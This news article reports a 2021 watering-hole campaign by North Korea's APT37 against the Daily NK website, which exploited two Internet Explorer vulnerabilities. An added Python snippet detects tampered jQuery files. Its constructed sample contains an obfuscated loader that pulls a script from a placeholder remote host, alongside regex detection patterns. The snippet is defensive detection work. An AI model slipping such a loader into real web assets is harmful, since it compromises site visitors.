SWC operations have been successfully carried out by cybercriminals using a new ingenious malware version

Aug 18, 2021 14:13 GMT  ·  By

InkySquid, a North Korean hacker, exploited two different vulnerabilities in Internet Explorer to infect users via custom Strategic Web Compromise (SWC) operations, according to The Hacker News.

The vulnerabilities in question are CVE-2021-26411 - Internet Explorer Memory Corruption Vulnerability, with a CVSS score of 8.8, and CVE-2020-1380 - Scripting Engine Memory Corruption Vulnerability, with a CVSS score of 7.5. Both vulnerabilities have been actively exploited in the wild, with North Korean hackers compromising security research and development experts in a campaign launched in early January.

A South Korean online publication was the first victim of the hacker also known as APT37 or ScarCruft. The magazine in question, Daily NK, was serving malware from the end of March to the beginning of June this year. The infection wasn't detected sooner because the malware's sophisticated design lets the exploit code pass as legitimate content on the site, says Volexity.

The researchers noted, "While SWCs are not as popular as they once were, they continue to be a weapon in the arsenal of many attackers. The use of recently patched exploits for Internet Explorer and Microsoft Edge will only work against a limited audience".

The modus operandi involved inception

Obfuscated JavaScript code, disguised among the legitimate jQuery JavaScript libraries served by the website, was loaded from a remote URL. The malicious code was then used to exploit the two known Internet Explorer vulnerabilities. Luckily, the bugs were fixed by Microsoft in August 2020 and March 2021, respectively.
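The defensive counterpart to the technique above is verifying that a site's served library files still match what was deployed and flagging loader-like constructs inside them. The following is an added illustration, not code from the article, Volexity, or Daily NK; the jQuery stub, the tampered copy, the asset path and the remote host `cdn.example.invalid` are all constructed for the example.

```python
import hashlib
import re

# Constructed sample assets (not real site content). CLEAN_JS stands in for a
# legitimate jQuery file; TAMPERED_JS is the same file with an obfuscated loader
# appended that creates a <script> element pointing at a hypothetical remote host.
CLEAN_JS = (
    "/*! jQuery v3.5.1 | (c) JS Foundation */\n"
    "(function(a){a.fn.ready=function(f){f();return this};})(window.jQuery);\n"
)
TAMPERED_JS = CLEAN_JS + (
    "var _0x1=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f'];"
    "var s=document.createElement('script');"
    "s.src=_0x1[0]+'cdn.example.invalid/lib.js';document.head.appendChild(s);\n"
)

def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()

# Baseline of known-good hashes, normally captured at deploy time from the
# site's own release artifacts; here built from the constructed clean file.
BASELINE = {"/js/jquery.min.js": sha256_hex(CLEAN_JS)}

# Constructs that are common in injected loaders but rare in a vendored
# library: dynamic script creation, runs of hex-escaped string bytes, eval.
SUSPICIOUS = re.compile(
    r"createElement\(['\"]script['\"]\)"
    r"|(?:\\x[0-9a-fA-F]{2}){4,}"
    r"|\beval\(|\bunescape\("
)

def check_asset(path: str, content: str, baseline=BASELINE) -> list:
    """Return a list of findings for one served asset; empty means clean."""
    findings = []
    expected = baseline.get(path)
    if expected is None:
        findings.append(f"{path}: no baseline hash, cannot verify integrity")
    elif sha256_hex(content) != expected:
        findings.append(f"{path}: hash mismatch, served file differs from baseline")
    for m in SUSPICIOUS.finditer(content):
        findings.append(f"{path}: suspicious construct at offset {m.start()}: {m.group(0)[:24]}")
    return findings

if __name__ == "__main__":
    for label, body in (("clean", CLEAN_JS), ("tampered", TAMPERED_JS)):
        print(label, check_asset("/js/jquery.min.js", body) or ["ok"])
```

The hash comparison catches any modification of a baselined file, while the pattern heuristics give an analyst a starting offset even when no baseline exists.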

The threat actors were able to carry out their attacks undetected with additional customized malware. Following a successful exploit, they deployed a novel backdoor called BLUELIGHT and a Cobalt Strike stager.

Malware of this type is capable of executing shellcode, stealing passwords and cookies from Internet Explorer, Chrome, and Edge, collecting information about the installed antivirus software, collecting system metadata, and carrying out a variety of other harmful activities.